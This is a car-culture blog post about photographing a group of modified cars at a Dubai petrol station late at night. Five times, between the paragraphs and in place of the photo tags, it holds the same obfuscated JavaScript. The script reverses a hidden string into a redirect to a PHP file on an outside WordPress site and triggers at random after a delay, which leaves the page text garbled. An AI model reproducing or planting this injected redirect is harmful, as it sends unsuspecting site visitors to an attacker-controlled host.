It’s been a while since I had the pleasure of taking a proper drive around the streets of Dubai to soak up some of the Street culture that this part of the world and especially Dubai is known for. So there’s James and I cruising down the Beach Road when we both decided to hole up at a petrol station to grab some drinks and check the world out for half an hour or so…not ten minutes had passed when the culture came running to us!

A crowd of young guys in the Charger you can see, the Lexus just out of the picture and the Jeep SRT/8 in the background all rocked up after seeing James hawking around with his camera and lighting rigs…The bright lights do attract attention!!

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/james/_JL31052_Proc.jpg” width=”728″ />

When the Regional Car stats highlight the SUV segment as the growing segment of car sales there is no denying it with proof like this. We had turned our backs for 5 mins and this lot rolled in…The Vesuvius Orange Range Rover Sport was driven by a British chap that had only been in Dubai for 3 weeks at the time. Nowt like trying to fit in as soon as possible!

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/james/_JL31058_Proc.jpg” width=”728″ />

“Take our photos” was the question of the night!! So out came the lighting rigs and we set-up on the petrol station forecourt to get some pics of these chaps. I suppose the cool thing was that they were more than happy to sit and chat about nothing and everything with us…almost as if it happens all the time.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/james/_JL30857_Proc.jpg” width=”728″ />

Our transport for the evening – a Porsche 993RS. The car was put to good effect that night!

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/james/_JL31073_Proc.jpg” width=”728″ />

We have used this shot before, however it deserves to come out again – The night was over…it was 3am and James and I where heading home in different directions after stopping for a drink. As I jumped in my car, in rolled the West Coast Customs Range Stormer..nuff said.

  1. If I wasn’t banned from Jumeirah Beach Road I’d hit it…last time I was out there I was surrounded by Murcielago Sypders, New Roll Royce Coupes, SLRs, the obligatory F430 Cabrios, plenty of 65AMG Mercs etc. etc.
